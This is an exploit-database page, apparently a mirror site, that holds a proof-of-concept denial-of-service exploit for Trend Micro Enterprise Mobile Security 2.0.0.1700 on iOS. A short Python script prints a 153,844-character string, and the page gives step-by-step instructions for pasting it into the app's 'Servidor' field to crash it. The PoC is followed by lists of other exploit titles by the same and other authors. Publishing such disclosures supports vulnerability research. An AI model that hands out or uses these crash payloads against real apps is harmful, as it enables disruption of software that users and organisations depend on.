Search for hundreds of thousands of exploits

"Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)"

Author

Exploit author

"Luis Martínez"

Platform

Exploit platform

ios

Release date

Exploit published date

2018-08-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# Exploit Title: Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2018-08-26
# Vendor Homepage: https://www.trendmicro.com/en_se/business/products/user-protection/sps/mobile.html
# Software Link: App Store for iOS devices
# Tested Version: 2.0.0.1700
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: iPhone 7 iOS 11.4.1

# Steps to Produce the Crash:
# 1.- Run python code: Enterprise_Mobile_Security_2.0.0.1700.py
# 2.- Copy content to clipboard
# 3.- Open App Enterprise Mobile Security
# 4.- Inscribirse manualmente
# 5.- Servidor local
# 6.- Paste ClipBoard on "Servidor:"
# 7.- Puerto: 80
# 8.- Siguiente
# 9.- Crashed

#!/usr/bin/env python

buffer = "\x41" * 153844
print (buffer)
Release Date Title Type Platform Author
2020-10-23 "Lot Reservation Management System 1.0 - Authentication Bypass" webapps php "Ankita Pal"
2020-10-23 "Gym Management System 1.0 - 'id' SQL Injection" webapps php "Jyotsna Adhana"
2020-10-23 "Car Rental Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Point of Sales 1.0 - 'id' SQL Injection" webapps php "Ankita Pal"
2020-10-23 "Lot Reservation Management System 1.0 - Cross-Site Scripting (Stored)" webapps php "Ankita Pal"
2020-10-23 "Ajenti 2.1.36 - Remote Code Execution (Authenticated)" webapps python "Ahmet Ümit BAYRAM"
2020-10-23 "Online Library Management System 1.0 - Arbitrary File Upload" webapps php "Jyotsna Adhana"
2020-10-23 "Stock Management System 1.0 - 'brandId and categoriesId' SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "User Registration & Login and User Management System 2.1 - SQL Injection" webapps php "Ihsan Sencan"
2020-10-23 "Point of Sales 1.0 - 'username' SQL Injection" webapps php "Jyotsna Adhana"
Release Date Title Type Platform Author
2020-05-01 "Super Backup 2.0.5 for iOS - Directory Traversal" webapps ios Vulnerability-Lab
2020-05-01 "HardDrive 2.1 for iOS - Arbitrary File Upload" webapps ios Vulnerability-Lab
2020-04-29 "Easy Transfer 1.7 for iOS - Directory Traversal" webapps ios Vulnerability-Lab
2020-04-23 "Sky File 2.1.0 iOS - Directory Traversal" webapps ios Vulnerability-Lab
2020-04-17 "Playable 9.18 iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2020-04-15 "AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2020-04-15 "SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting" webapps ios Vulnerability-Lab
2020-04-15 "File Transfer iFamily 2.1 - Directory Traversal" webapps ios Vulnerability-Lab
2020-03-23 "ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)" dos ios "Ivan Marmolejo"
2020-02-03 "P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)" dos ios "Ivan Marmolejo"
Release Date Title Type Platform Author
2020-08-06 "CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path" local windows "Luis Martínez"
2020-08-05 "QlikView 12.50.20000.0 - 'FTP Server Address' Denial of Service (PoC)" dos windows "Luis Martínez"
2020-08-04 "RTSP for iOS 1.0 - 'IP Address' Denial of Service (PoC)" dos windows "Luis Martínez"
2020-08-04 "Mocha Telnet Lite for iOS 4.2 - 'User' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-11-25 "Waves MaxxAudio Drivers 1.1.6.0 - 'WavesSysSvc64' Unquoted Service Path" local windows "Luis Martínez"
2019-11-19 "scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC)" dos ios "Luis Martínez"
2019-11-19 "Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path" local windows "Luis Martínez"
2019-11-18 "Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path" local windows "Luis Martínez"
2019-11-18 "Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC)" dos ios "Luis Martínez"
2019-11-04 "OpenVPN Connect 3.0.0.272 - 'agent_ovpnconnect' Unquoted Service Path" local windows "Luis Martínez"
2019-01-31 "Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-07 "BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-07 "SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-07 "Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)" dos windows "Luis Martínez"
2019-01-02 "NBMonitor Network Bandwidth Monitor 1.6.5.0 - 'Name' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2019-01-02 "NetworkSleuth 3.0.0.0 - 'Key' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2018-09-13 "InduSoft Web Studio 8.1 SP1 - 'Tag Name' Buffer Overflow (SEH)" local windows_x86-64 "Luis Martínez"
2018-09-11 "InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)" local windows_x86-64 "Luis Martínez"
2018-09-04 "iSmartViewPro 1.5 - 'DDNS' Buffer Overflow" local windows_x86 "Luis Martínez"
2018-09-03 "Symantec Mobile Encryption for iPhone 2.1.0 - 'Server' Denial of Service (PoC)" dos ios "Luis Martínez"
2018-09-03 "Trend Micro Virtual Mobile Infrastructure 5.5.1336 - 'Server address' Denial of Service (PoC)" dos ios "Luis Martínez"
2018-08-29 "Cisco AnyConnect Secure Mobility Client 4.6.01099 - 'Introducir URL' Denial of Service (PoC)" dos ios "Luis Martínez"
2018-08-28 "Cisco Network Assistant 6.3.3 - 'Cisco Login' Denial of Service (PoC)" dos windows "Luis Martínez"
2018-08-27 "Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)" dos ios "Luis Martínez"
2018-08-24 "SkypeApp 12.8.487.0 - 'Cuenta de Skype o Microsoft' Denial of Service (PoC)" dos windows_x86-64 "Luis Martínez"
2018-08-02 "AgataSoft Auto PingMaster 1.5 - 'Host name' Denial of Service (PoC)" local windows "Luis Martínez"
2018-07-31 "Switch Port Mapping Tool 2.81 - 'SNMP Community Name' Denial of Service (PoC)" dos windows "Luis Martínez"
2018-07-30 "ipPulse 1.92 - 'IP Address/HostName-Comment' Denial of Service (PoC)" dos windows "Luis Martínez"
2018-07-27 "QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)" dos windows "Luis Martínez"
2018-07-27 "NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)" dos windows "Luis Martínez"
import requests
response = requests.get('https://www.nmmapper.com/api/v1/exploitdetails/45261/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.